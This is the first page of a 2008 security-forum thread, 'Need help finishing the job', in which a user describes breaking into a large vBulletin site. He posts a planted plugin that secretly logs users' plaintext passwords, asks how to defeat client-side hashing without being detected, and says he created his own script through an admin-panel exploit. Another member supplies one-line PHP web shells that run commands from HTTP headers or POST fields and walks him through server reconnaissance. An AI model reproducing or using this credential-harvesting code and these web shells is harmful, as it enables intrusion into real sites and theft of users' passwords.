Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 111
Members: 0
Total: 111
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> Need help finishing the job :D Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
Need help finishing the job :D
PostPosted: Wed Sep 17, 2008 4:08 am Reply with quote
ayvegh
Regular user
Regular user
Joined: Sep 17, 2008
Posts: 12




Hi everybody.

I've hacked a very large vBulletin-powered site.
I'm knowledgeable in PHP, MySQL, etc.

I have access to phpMyAdmin using the username/password from the config.php file, and I have installed my own little "swiss army knife" script so I can manipulate things from a script perspective.

I do NOT have FTP access Sad

I do know, however, that the Admin of the site uses the same password for everything, so if I can manage to catch his password as he logs in, I will have complete control over the entire server (it's a dedicated rig; I'm able to browse the root of the machine using my script, although obviously my permissions are limited, since I'm running as the PHP user).

I've unobtrusively installed a plugin which catches all logins - here's what the plugin code and save table look like:
Plugin:
Code:
$vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "loginz (userid, username, password, password_md5, password_md5_utf, ipaddress) VALUES (" . $vbulletin->userinfo['userid'] . ", '" . $vbulletin->db->escape_string($vbulletin->userinfo['username']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password_utf']) . "', '" . $vbulletin->db->escape_string(IPADDRESS) . "' )");

Table:
Code:
CREATE TABLE `loginz` (
`logid` int(10) NOT NULL auto_increment,
`userid` int(10) NOT NULL default '0',
`username` varchar(100) NOT NULL default '',
`password` varchar(255) NOT NULL,
`password_md5` varchar(255) NOT NULL,
`password_md5_utf` varchar(255) NOT NULL,
`ipaddress` varchar(15) NOT NULL default '',
`date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
PRIMARY KEY (`logid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;


What I need to know is: How can I disable the automatic MD5-ing of the password by the JavaScript in the login form?

I know that this line:
Code:
define('DISABLE_PASSWORD_CLEARING', true);

works to do that if it's in the config.php file, but can it be implemented via a plugin?

If not, is there a way I can disable just the JavaScript in the login form (I want to remain relatively undetected, so I won't turn off AJAX for the entire site, even though there is an option for that)?

Any help regarding this will be very much appreciated, and I thank you in advance.

ayvegh
View user's profile Send private message
PostPosted: Wed Sep 17, 2008 5:29 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Try password for mysql to ftp,admin panel ..etc.If you don't have shell upload some small shell on server and look maybe this guy have other sites on this server.Search admin panel's,passwords,other databases ....etc.You need to get owner level and then you can edit the login.php and catch password.
View user's profile Send private message
PostPosted: Wed Sep 17, 2008 5:55 am Reply with quote
ayvegh
Regular user
Regular user
Joined: Sep 17, 2008
Posts: 12




koko wrote:
Try password for mysql to ftp,admin panel ..etc.If you don't have shell upload some small shell on server and look maybe this guy have other sites on this server.Search admin panel's,passwords,other databases ....etc.You need to get owner level and then you can edit the login.php and catch password.

I know one of the Admin's passwords, the other one that he uses everwhere.
It's not the same on here, and the MySQL password is randomly generated.

I've gone through every other site hosted on the server; none of them are even live anymore, and none of them have valid password data in them.

What do you mean by "shell"? Do you have any sample shell scripts I could look at?
View user's profile Send private message
PostPosted: Wed Sep 17, 2008 7:07 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Something like

Code:
<?php $footer = @getenv('HTTP_FOOTER'); if($footer) {@passthru($footer); exit;} ?>


Working with headers

FOOTER:ls -al
View user's profile Send private message
PostPosted: Wed Sep 17, 2008 11:49 pm Reply with quote
ayvegh
Regular user
Regular user
Joined: Sep 17, 2008
Posts: 12




Hmm... now I'm really confused.

I have read-only access to the root of the filesystem.
What would that script accomplish?

Many thanks,
ayvegh
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 5:23 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




ayvegh wrote:
Hmm... now I'm really confused.

I have read-only access to the root of the filesystem.
What would that script accomplish?

Many thanks,
ayvegh


This shell don't give you root perm's.nobody or apache in best way owner/owner

Try FOOTER:id
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 4:26 am Reply with quote
ayvegh
Regular user
Regular user
Joined: Sep 17, 2008
Posts: 12




I hate to sound like such a noob, but I have two questions:

1. What are you trying to accomplish with these shell scripts?

2. How do I use these scripts? <?php exec(); ?> ?

Thanks again,
ayvegh
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 5:32 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




ayvegh wrote:
I hate to sound like such a noob, but I have two questions:

1. What are you trying to accomplish with these shell scripts?

2. How do I use these scripts? <?php exec(); ?> ?

Thanks again,
ayvegh


1.Social injeenering.
2.Only like this <?php @exec('cmd'); ?>
Working with POST cmd=ls -al
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 5:54 am Reply with quote
ayvegh
Regular user
Regular user
Joined: Sep 17, 2008
Posts: 12




Hmm... that's not any form of social engineering I know of, but hey, I'm the noob here, right? Wink

Okay, so I ran this code from my location in the web directory:
Code:
$output = NULL;
@exec("ls -al /", $output);
print_r($output);

And got this output:
Code:
Array
(
[0] => total 125
[1] => drwxr-xr-x 22 root root 4096 2007-05-08 12:21 .
[2] => drwxr-xr-x 22 root root 4096 2007-05-08 12:21 ..
[3] => drwxr-xr-x 2 root root 4096 2008-06-01 09:17 bin
[4] => drwxr-xr-x 4 root root 1024 2008-06-01 09:18 boot
[5] => lrwxrwxrwx 1 root root 11 2007-05-08 12:16 cdrom -> media/cdrom
[6] => drwxr-xr-x 13 root root 3900 2008-04-02 06:47 dev
[7] => drwxr-xr-x 72 root root 4096 2008-06-01 09:19 etc
[8] => drwxr-xr-x 6 root root 4096 2007-07-01 14:59 home
[9] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 initrd
[10] => lrwxrwxrwx 1 root root 28 2007-05-08 12:18 initrd.img -> boot/initrd.img-2.6.18-4-686
[11] => drwxr-xr-x 12 root root 12288 2008-06-01 09:17 lib
[12] => drwx------ 2 root root 16384 2007-05-08 12:14 lost+found
[13] => drwxr-xr-x 3 root root 4096 2007-05-08 12:16 media
[14] => drwxr-xr-x 2 root root 4096 2006-10-28 16:06 mnt
[15] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 opt
[16] => dr-xr-xr-x 183 root root 0 2008-04-02 06:46 proc
[17] => drwxr-xr-x 11 root root 4096 2008-06-18 14:24 root
[18] => drwxr-xr-x 2 root root 4096 2008-06-01 09:17 sbin
[19] => drwxr-xr-x 2 root root 4096 2007-03-07 23:56 selinux
[20] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 srv
[21] => drwxr-xr-x 11 root root 0 2008-04-02 06:46 sys
[22] => drwxrwxrwt 21 root root 36864 2008-09-19 07:47 tmp
[23] => drwxr-xr-x 11 root root 4096 2007-05-10 18:32 usr
[24] => drwxr-xr-x 14 root root 4096 2007-05-10 18:31 var
[25] => lrwxrwxrwx 1 root root 25 2007-05-08 12:18 vmlinuz -> boot/vmlinuz-2.6.18-4-686
)

What does that do for me, aside from telling me that I can't do much in the root directory (unless I'm reading those chmod letters wrong)?

Thanks again,
ayvegh
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 6:30 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Try with pwd
Then ls -al /bla/bla/ from pwd result
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 6:12 pm Reply with quote
ayvegh
Regular user
Regular user
Joined: Sep 17, 2008
Posts: 12




Okay, so I've refined my code a bit:
Code:
print_r(shell_exec('pwd'));

All that gives me is the directory string of where my script is located:
Code:
/var/www/[redacted]/www/[redacted]

Doing this:
Code:
print_r(shell_exec('ls -al ' . shell_exec('pwd')));

Gives me the directory listing for my scripts location, which looks like this:
Code:
total 124
drwxrwxrwx 2 10001 www-data 4096 2008-09-15 08:02 .
drwxr-xr-x 26 10001 www-data 4096 2008-09-01 15:59 ..
-rw-r--r-- 1 10001 www-data 1848 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 6664 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 0 2008-04-25 20:50 index.html
-rw-r--r-- 1 www-data www-data 6099 2008-09-15 08:01 redacted.php <-- My script, created using an exploit in the ACP ;)
-rw-r--r-- 1 10001 www-data 7223 2006-11-24 10:26 redacted.php
-rw-r--r-- 1 10001 www-data 5689 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 2108 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 2819 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 30243 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 7633 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 1659 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 1098 2005-09-16 05:00 redacted.php
-rw-r--r-- 1 10001 www-data 10754 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 3443 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 534 2006-04-05 05:00 redacted.php
-rw-r--r-- 1 10001 www-data 4032 2008-04-25 20:50 welcomeblock.php

But I have all of that information already, as I said.
The "My script" highlighted above is what I'm using to execute these commands.

It has a built-in filebrowser/downloader (I'm adding zipping and maybe RAR functions soon), and a code executor, inputted via the address bar in Base64.

So what does this do for me? Smile

Thanks again for your patience,
ayvegh
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 8:13 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




next command 'id'
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 8:26 pm Reply with quote
ayvegh
Regular user
Regular user
Joined: Sep 17, 2008
Posts: 12




Code:
print_r(shell_exec('id'));

gives
Code:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
View user's profile Send private message
PostPosted: Sat Sep 20, 2008 8:12 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Show me

ls -al /var/www/[redacted]/www/
View user's profile Send private message
PostPosted: Sun Sep 21, 2008 2:07 am Reply with quote
ayvegh
Regular user
Regular user
Joined: Sep 17, 2008
Posts: 12




koko wrote:
Show me

ls -al /var/www/[redacted]/www/

No need to post the whole thing- here's a directory and a file:
Code:
total 3110
drwxr-xr-x 4 10001 www-data 4096 2008-09-01 16:18 admincp
-rw-r--r-- 1 10001 www-data 39174 2008-01-27 01:00 global.php

Having seen the FTP users database (and unsuccessfully adding a user), I can tell you that userid 10001 is the Admin's FTP account.

Any way to reverse MySQL PASSWORD() hashing? Wink
View user's profile Send private message
Need help finishing the job :D
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.053 Seconds